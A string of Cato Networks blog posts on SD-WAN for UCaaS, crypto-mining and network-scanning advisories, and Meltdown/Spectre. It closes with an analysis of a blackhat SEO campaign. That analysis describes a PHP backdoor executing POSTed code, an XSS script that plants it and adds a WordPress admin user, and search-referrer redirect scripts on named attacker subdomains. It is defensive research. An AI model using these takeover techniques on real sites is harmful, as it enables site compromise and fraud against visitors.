Here, branch offices connect to SD-WAN provider points of presence over the Internet. The enterprise’s logical, virtual WAN is created by the service provider; the provider’s service cloud delivers SD-WAN functionality like routing traffic on the ideal path to support the performance and resilience needs of UCaaS traffic while minimizing cost. One way an SD-WAN service provider can optimize delivery to a UCaaS provider is by selecting an optimal Internet egress point, close to the UCaaS provider, so the last hop across the Internet is a short hop. Another way is to place a POP in the same facility as the UCaaS provider and deliver traffic to its network within the facility, or engineer a dedicated link to a nearby location, the net result being that the Internet is out of the picture for the last hop.
If you are adopting or considering adopting UCaaS make sure to evaluate how you will connect to your UCaaS provider. Consider SD-WAN services for their ability to reduce WAN spend while meeting UCaaS performance, management, and security requirements.
I’ve been an IT manager for a long time, only recently joining the Cato team. Prior to Cato, you might say that I lived my life in a box — a Cisco box, a Palo Alto box, a Checkpoint box….you get the point. Now, as the IT manager at Cato, I’ve been using Cato Cloud...
Tales from the Trenches: What I Love About My Cato Cloud I’ve been an IT manager for a long time, only recently joining the Cato team. Prior to Cato, you might say that I lived my life in a box — a Cisco box, a Palo Alto box, a Checkpoint box….you get the point. Now, as the IT manager at Cato, I’ve been using Cato Cloud to run Cato’s internal network. I’ve seen first hand how Cato can simplify the life of an IT manager. Below are some of my tips and observations for how I’ve gotten the most of being “out of the box” with this cloud-based security and networking service.
Bye, bye VPN. I don’t know about you but I’ve never liked my mobile VPN. It’s a pain to configure and even once you get it operational, performance can be pretty debilitating. I used to field many complaints from salespeople or executives on the road as to “how $%^* bad my mobile connection is working.” When I got to Cato, I fell in love with Cato Cloud’s mobile capabilities. The Cato mobile client works faster than any VPN I’ve experienced. Instead of having to connect back to a home office across the globe, the Cato mobile client connects to the nearest Cato PoP regardless of where in the world the device is. All of which cuts latency down because the traffic has less distance to travel and, more importantly, makes for happier roaming executive.
The cloud in my pocket. Before joining Cato, my users would constantly complain about the performance of cloud resources. With the Cato Cloud, my offices feel like they sit right next to the biggest cloud services around, like AWS, Azure, Office 365 and Jira. The performance is that good. That’s because Cato co-locates many of our PoPs in the same physical data centers as the IXPs of leading cloud providers. I’ve been able to configure rules such that our Office 365 traffic from our Tel Aviv office, for example, enters through our Tel Aviv PoP, travels across the Cato Cloud network and, then egresses in Amsterdam right next to the Internet destination. The alternative would have been sending the traffic across the Internet core which is always a crapshoot.
A huge time saver. I used to waste what felt like hours each month jumping between consols, figuring out new UIs, and the like. The simplicity of managing my Cato network has meant I can save a ton of time on the most mundane things like setting up security policies, onboarding new users, or managing a branch. I can’t quantify exactly how much time has been saved but I can tell it’s a lot. Who couldn’t use more time in their workday?
The eye in the sky. Cato gives me real-time transport monitoring through a single pane of glass. This helps me keep an eye on the Internet lines, in particular, in the event of a slowdown during the workday. In the days before we enabled bandwidth throttling, a worker started to upload 520 GB of files to Amazon S3, hogging the site’s upstream capacity. I was quickly able to see which user, what application and what type of traffic was responsible for this massive slowdown and, politely, get him to stop.
Real-time network monitoring makes me look smarter than my users. I use Cato’s analytics to monitor our Internet service usage and the connectivity of our branches. If there’s a problem, I’m the first one to get notified. I get a good chuckle when my sales guys in Atlanta are surprised to find out that they’re having an Internet problem — and I’m already working on it from halfway across the globe.
Security is so much simpler than with a traditional network. With traditional firewalls and security appliances, you need to know the nuances of the different systems you’re working with. They might all block access to specific IPs but some had you thinking in terms of applications while most others built rules based on IP. The transition can be confusing and that’s just one example. Security rules in Cato Cloud were, well, simple. I could choose to define rules how it was most conformable to me — by IP, application, and even by user identity. There aren’t a lot of “vendor extensions” that need to be mastered just to get your security going. If you know the basics of firewall operation that’s enough.
Keeping tabs on security. In most legacy systems that I worked with there was a possibility of receiving a daily or weekly report of security incidents but nothing in real-time. Even with a SIEM, we’d need to have someone examine the logs and reports to determine if there’s been an attack. It meant I was constantly reacting to incidents, a step behind the attackers launching the attacks and often the users who were calling about them. Cato’s real-time alert security notifications put me ahead of our security threats and complaints. I receive email notifications when “something’s up” and can take action right from my mobile device, if necessary.
As an IT manager, I appreciate the simplicity of setting up and managing my company’s network and all the security we need for our users, branches, applications, and data. Cato Cloud might have been early when I first looked at it years ago, but now it’s definitely time for everything the Cato Cloud has to offer.
Unified Communications as a Service (UCaaS) adoption is on the rise in the enterprise and with that comes significant impact for IT managers considering how their MPLS network transformation. I’ll be taking a deeper look into those challenges in this week’s webinar, but here’s a quick preview. What’s UC and why UCaaS Like UC, UCaaS...
Why Traditional MPLS Networks are Ill-Suited for UCaaS Unified Communications as a Service (UCaaS) adoption is on the rise in the enterprise and with that comes significant impact for IT managers considering how their MPLS network transformation. I’ll be taking a deeper look into those challenges in this week’s webinar, but here’s a quick preview.
What’s UC and why UCaaS
Like UC, UCaaS improves team collaboration by packaging calling, meetings, team collaboration into a seamless experience. But while UC brings the cost and complexity of hosting and maintaining server infrastructure in the enterprise datacenters, UCaaS avoids those problems, putting UC in the cloud. Organizations gain the flexibility, easy adoption, predictable costs, and quick access to emerging features that are first, and in many cases, only available via the cloud.
The UCaaS challenge for modern WANs
For all of its benefits, UCaaS poses significant challenges for traditional enterprise network architectures.
Most enterprise data networks are still optimized for a computing model in which the bulk of applications reside in the datacenter. Clients - including browser, native app, and those running within virtual desktop infrastructure - are used to interact with applications and data stores either in enterprise-owned facilities or within co-location providers connected to the enterprise network via Ethernet and MPLS. Internet access remains tightly controlled, with only large, or headquarters facilities having local Internet connectivity. Thus, all access to Internet-based apps requires routing flows from the branch to the headquarters or datacenter location, and then out to the Internet.
This approach is ill-suited to a rapidly changing application delivery model in which apps may reside in public cloud infrastructure (e.g. Platform-as-a-Service (PaaS) and Infrastructure-as-a-Service (IaaS) or are obtained from software-as-a-service (SaaS) providers. This is especially true for those adopting Unified Communications-as-a-Service (UCaaS) due to the potential for poor voice and video performance as a result of excessive latency and variable network performance.
Consider the scenario in which a worker at a branch office calls a worker at another branch office. In the centralized Internet access architectural model, that call would go from the originating branch, out the nearest Internet connection point, to the UCaaS provider, and then back in the Internet connection point nearest to the destination branch as shown below:
This inefficient routing of call traffic is likely to lead to poor call performance, as well as potentially overloaded Internet connection points, especially when using high-bandwidth apps like video-conferencing and video streaming.
SD-WANs and needed changes for better UCaaS experience
What’s needed is a rethinking of network architectures, one that is optimized for UCaaS. In this new model, Internet access is available at every branch, ensuring that each branch is able to reach the UCaaS provider as efficiently as possible.
But simply connecting all branches to the Internet creates security challenges and may not provide sufficient performance to support real-time applications. The answer? SD-WAN. SD-WAN enables organizations to bring direct Internet connectivity to all branch offices and may provide performance guarantees to ensure that latency and jitter levels meet the needs of real-time applications.
At the branch, SD-WAN virtualizes wide area network access services, enabling branch office traffic to be sent along the optimal route for performance need. SD-WAN services that provide their own backbone can also optimize traffic globally, avoiding potential performance issues from using Internet-based services (see below).
Furthermore, leveraging SD-WAN services that offer security management can reduce operating costs, and headaches, saving enterprise customers from the expense and complexity of managing distributed Internet access points. They can ensure the application of consistent policies at all branches without the need to deploy additional branch hardware, and they can protect against UC-specific attacks including SIP ex-filtration (in which SIP requests are used to obtain data from endpoints running SIP softphones) as well as denial of service attacks.
Learn more about SD-WAN and UCaaS
The result of using SD-WAN is a modern data network, optimized for cloud-based applications, and able to support the unique performance requirements of UCaaS. To learn more about SD-WAN and UCaaS, join me and Dave Greenfield, Cato’s technology evangelist, on this week’s webinar.
With Bitcoin, and cryptocurrencies in general, growing in popularity, many customers have asked Cato Research Labs about Bitcoin security risks posed to their networks. Cato Research Labs examined crypto mining and the threats posed to the enterprise. While immediate disruption of the network or loss of data is unlikely to be a direct outcome of...
The Crypto Mining Threat: The Security Risk Posed By Bitcoin and What You Can Do About It With Bitcoin, and cryptocurrencies in general, growing in popularity, many customers have asked Cato Research Labs about Bitcoin security risks posed to their networks.
Cato Research Labs examined crypto mining and the threats posed to the enterprise. While immediate disruption of the network or loss of data is unlikely to be a direct outcome of crypto mining, increased facility costs may result. Indirectly, the presence of crypto mining software likely indicates a device infection.
Customers of Cato’s IPS as a service are protected against the threats posed by crypto mining. Non-Cato customers should block crypto mining on their networks. This can be done by disrupting the process of joining and communicating with the crypto mining pool either by blocking the underlying communication protocol or by blocking crypto mining pool addresses and domains. For a list of addresses and domains, you should block, click here.
The Risk of Crypto Mining and What You Can Do
Crypto mining is the validating of bitcoin (or other cryptocurrency) transactions and the adding of encrypted blocks to the blockchain. Miners establish valid block by solving a hash, receiving a reward for their efforts. The possibility of compensation is what attracts miners, but it’s the need for compute capacity to solve the hash that leads miners to leverage enterprise resources.
Mining software poses direct and indirect risks to an organization:
Direct: Mining software is compute intensive, which will impact the performance of an employee’s device. Running processors at a “high-load” for a long time will increase electricity costs. The life of a processor or the battery within a laptop may be shortened.
Indirect: Some botnets are distributing native mining software, which accesses the underlying operating system in a way similar to how malware exploits a victim’s device. The presence of native mining software may well indicate a compromised device.
Cato Research Labs recommends blocking crypto mining. Preferably, this should be done using the deep packet inspection (DPI) engine in your firewalls. Configure a rule to detect and the block the JSON-RPC messages used by Stratum, the protocol mining pools use to distribute tasks among member computers. DPI rules should be configured to block based on three fields which are required in Stratum subscription requests: id, method, and params.
However, DPI engines may lack the capacity to inspect all encrypted traffic. Blocking browser-based, mining software may be a problem as Stratum often runs over HTTPS. Instead, organizations should block access to the IP addresses and domains used by public blockchain pools.
Despite our best efforts, no such list of pool address or domains could be found, which led Cato Research Labs to develop its own blacklist. Today, the list identifies hundreds of pool addresses. The list can be download here for import into your firewall.
Cryptocurrency mining may not be the gravest threat to enterprise security, but it should not be ignored. The risk of impaired devices, increased costs, and infections means removing mining software warrant immediate attention. The blacklist of addresses provided by Cato Research Labs will block access to existing public blockchain pools, but not new pools or addresses. It’s why Cato Research strongly recommends configuring DPI rules on DPI engine that have sufficient capacity to inspect all encrypted sessions.
In the light of recent ransomware attack campaigns against Microsoft RDP servers, Cato Research assessed the risk network scanning poses to organizations. Although well researched, many organizations continue to be exposed to this attack technique. Here’s what you can (and should) do to protect your organization. What is Network Scanning? Network scanning is a process...
Advisory: Why You Should (Still) Care About Inbound Network Scans In the light of recent ransomware attack campaigns against Microsoft RDP servers, Cato Research assessed the risk network scanning poses to organizations. Although well researched, many organizations continue to be exposed to this attack technique. Here’s what you can (and should) do to protect your organization.
What is Network Scanning?
Network scanning is a process for identifying active hosts on a network. Different techniques may be used. In some cases, network scanners will use port scans and in other cases ping sweeps. Regardless, the goal is to identify active hosts and their services.
Network scanning is commonly associated with attackers but not every network scan indicates a threat. Some scanners are benign and are part of various research initiatives. The University of Pennsylvania, for example, uses network scanning in the study of global trends in protocol security. However, while research projects will stop at scanning Internet IP-ranges for potentially open services, malicious actors will go further and attempt to hack or even gain root privilege on remote devices.
What’s Services Are Normally Targeted By Network Scanning?
While some scans target specific organizations, most scans over the Internet are searching for vulnerable services where hackers can execute code on the remote device.
Occasionally, after a new vulnerability in a service is publically introduced, a massive scan for this service will follow. Attackers may try to gain control of IoT devices or routers, control them using a bot that may be used later for DDoS attacks (such as the Mirai botnet) or even cryptocurrencies mining, which are very popular these days.
In addition, hackers may exploit known vectors in websites that serve many users, such as Wordpress vulnerabilities. This can be used as a source for drive-by attacks to compromise end-user machines on a large scale
How Widespread Are Network Scanning Attacks?
We’ve seen that some organizations continue to expose services unnecessarily to the world. Those services are being scanned, which exposes them to attack.
During a two-week period, Cato Research observed scans from thousands of scanners. More than 80% of the scanners originated from China, Latvia, Netherlands, Ukraine or the US (see figure 1).
Figure 1 - Top countries originating scans
When we look at the types of the scanned services, most scans targeted SQL, Microsoft RDP (Remote Desktop Protocol) and HTTP for different reasons (see figure 2). The large number of RDP scans is due to a variety of disclosed vulnerabilities in RDP, exploited by recent ransomware attack campaigns using password-guessing, brute force attacks on Microsoft RDP servers.
As for SQL Servers, it seems like the hunt for databases still exists. Servers running SQL tend to contain the most valuable information from the attacker’s perspective - personal details, phone numbers, and credit card information. This also applies to attacks on web servers, which may store valuable information such as personal information about web-site users, like their email addresses and passwords.
Figure 2 - HTTP, RDP, and SQL were the most scanned services
Organizations should protect themselves from scanning attacks with the following actions:
Whenever possible, the organization should not expose servers to the Internet. They should only make them accessible via the WAN firewall to sites and mobile users connected to Cato Cloud.
In case a server needs to be accessed from the public Internet, we recommend limiting access to specific IP addresses or ranges. This can be easily done by configuring Remote Port Forwarding in the Cato management console. When IP access rules are not enough, consider applying IPS geo-restriction rules to deny any access from “riskier” regions, such as accepting inbound connections from China, Latvia, Netherland or Ukraine.
If none of the above could be set, we recommend using Cato IPS rules to help in blocking various attempts to attack the server.
Network scanning may be a well-known technique but that doesn’t diminish its effectiveness. Be sure to apply these recommendations to prevent attackers from using this technique to penetrate of your network.
Read about top security websites
The much publicized critical CPU vulnerabilities published last week by Google’s Project Zero and its partners, will have their greatest impact on virtual hosts or those servers where threat actors can gain physical access. The vulnerabilities, named Meltdown and Spectre, are hardware bugs that can be abused to leak information from one process to another...
The Meltdown-Spectre Exploits: Lock-down your Servers, Update Cloud Instances The much publicized critical CPU vulnerabilities published last week by Google’s Project Zero and its partners, will have their greatest impact on virtual hosts or those servers where threat actors can gain physical access.
The vulnerabilities, named Meltdown and Spectre, are hardware bugs that can be abused to leak information from one process to another in the underlying process or the dependent on operating system. More specifically, the vulnerability stems from a misspeculated execution that allows arbitrary virtual memory reads, bypassing process isolation of the operating system or processor. Such unauthorized memory reads may reveal sensitive information, such as passwords and encryption keys. These vulnerabilities affect many modern CPUs including Intel, AMD and ARM.
Cato Research Labs analyzed the security impact of vulnerabilities Spectre (CVE-2017-5753, and CVE-2017-5715) Meltdown (CVE-2017-5754) on Cato Cloud and our customers’ networks. Any measures needed to protect the software or hardware have been taken by Cato.
We highly recommend that Cato customers follow their cloud provider’s guidelines for patching operating system running in the virtual machine of their cloud hosts. Most cloud providers have already patched the underlying hypervisors. Specific patching instructions can be found here for Microsoft Azure, Amazon AWS, and Google Cloud Platform.
Additional information about the attacks is described in Google Project Zero blog. Meltdown was discovered by Jann Horn at Google Project Zero; Werner Haas and Thomas Prescher at Cyberus Technology; and Daniel Gruss, Moritz Lipp, Stefan Mangard, Michael Schwarz at the Graz University of Technology.
Horn and Lipp were also credited in the discovery of Spectra along with Paul Kocher in collaboration with ( in alphabetical order) Daniel Genkin of the University of Pennsylvania and the University of Maryland, Mike Hamburg from Rambus, and Yuval Yarom from the University of Adelaide and Data61.
Legitimate websites are hacked and recruited into a spam network During a periodic analysis of Cato Cloud traffic in the Cato Research Lab, we noticed that our security analytics engine was triggered by a request to a code sharing service, Pastebin. The request was originated from a preschool website in Singapore (Figure 1). Pastebin is...
Anatomy of a Blackhat SEO spam campaign (with a twist) Legitimate websites are hacked and recruited into a spam network
During a periodic analysis of Cato Cloud traffic in the Cato Research Lab, we noticed that our security analytics engine was triggered by a request to a code sharing service, Pastebin. The request was originated from a preschool website in Singapore (Figure 1).
Pastebin is a popular service for code storing and sharing. A “paste” within a Pastebin account refers to a piece of code that can be dynamically fetched and placed within a specific context, for example, a web page. While the service is used for legitimate purposes, it can also be used to enable web-based, malicious activities.
[caption id="attachment_1490" align="alignnone" width="750"] Figure 1 - Website screen shot[/caption]
Analyzing the source code of the website led to a script tag, which was the source of the suspicious request. After analyzing other parts of the code, we noticed a few hidden links, which referred to shoe sales websites. Clearly, with no relation to the preschool website. (Figure 2).
[caption id="attachment_1441" align="alignleft" width="750"] Figure 2 - Suspicious code snippet[/caption]
The links are placed in a hidden part of the page overlapping one of the header, so anyone who clicks the header is unknowingly referred to one of those websites. This is a well-known technique called, “clickjacking”, which is used for various malicious purposes, such as collecting forced likes on a Facebook page.
When we dug a bit more on the specific Pastebin account, we saw additional pastes that indicate the malicious intentions of this actor.
[caption id="attachment_1443" align="alignnone" width="750"] Figure 4 - More than 500K hits on this paste[/caption]
The following figure shows one of the pastes containing a PHP backdoor (Figure 5). A backdoor is a piece of code that is planted in a site and gives an attacker the ability to control the web server of the hacked site. This simple, yet effective, backdoor executes PHP code that the attacker can send using HTTP POST requests.
[caption id="attachment_1444" align="alignnone" width="750"] Figure 5 - PHP backdoor paste[/caption]
The spam network in action
We discovered thousands of infected pages, all hosted on legitimate websites, containing links to the same spam retail network of sites. Each spam page contains a script that redirects users to a retail website operated by the spammers. The redirection occurs only if the user was referred to this page from a major search engine: Google, Bing, Yahoo or AOL (Figures 6,7). This is a common blackhat SEO method used to falsely increase a page’s ranks.
The script is hosted on several subdomains inlcuding “google.jj4.co” and ”gogle.jj4.co,” and the script name also varies.
[caption id="attachment_1447" align="alignnone" width="750"] Figure 6 - the script injection[/caption]
[caption id="attachment_1448" align="alignnone" width="750"] Figure 7 - contents of injected script[/caption]
At the time of publication we could not validate if purchased goods are actually delivered. Obviously, anyone who uses such techniques to acquire traffic is not a trustworthy merchant.
How the initial site takeover occurs
A search for the C&C domain in the paste from Figure 3 led us to the script that was used to attack the sites. The script is designed to exploit cross-site-scripting (XSS) vulnerabilities in Wordpress in order to take over the site, and plant the URL references to products and shops we have seen earlier.
First, the attack scripts appends a simple PHP backdoor to one of the installed Wordpress plugins - the exact PHP code that appears in one of the attacker’s pastes. Later, the script reports the domain and path of the hacked plugin.
[caption id="attachment_1523" align="alignnone" width="975"] Figure 6 - Attack script showing C&C URL[/caption]
[caption id="attachment_1524" align="alignnone" width="975"] Figure 7 - Attack script[/caption]
Lastly, the script attempts to add a user with administrative privileges to Wordpress (Figure 8).
[caption id="attachment_1525" align="alignnone" width="1075"] Figure 8 - Attack script[/caption]
The use of Pastebin in the context of the spam network is important here, because the attacker can quickly replace the command and control (C&C) server domain in the paste, and have it impact all infected sites. This is needed when C&C servers get blacklisted and there is a need to quickly change them. Obviously, it is hard for Pastebin to detect and stop these activities. While this may be nothing more than an eCommerce scam, the same method can be used to deliver malware through exploit kits that can put end users at a much higher risk. The volume of activity around the Paste indicates hundreds of thousands of users could be impacted.
To prevent your website from being taken over by such attacks, consider regularly patching your Wordpress instances and Wordpress plugins, and limiting admin access to specific IP address, such as your corporate network external IP.
Read about top security websites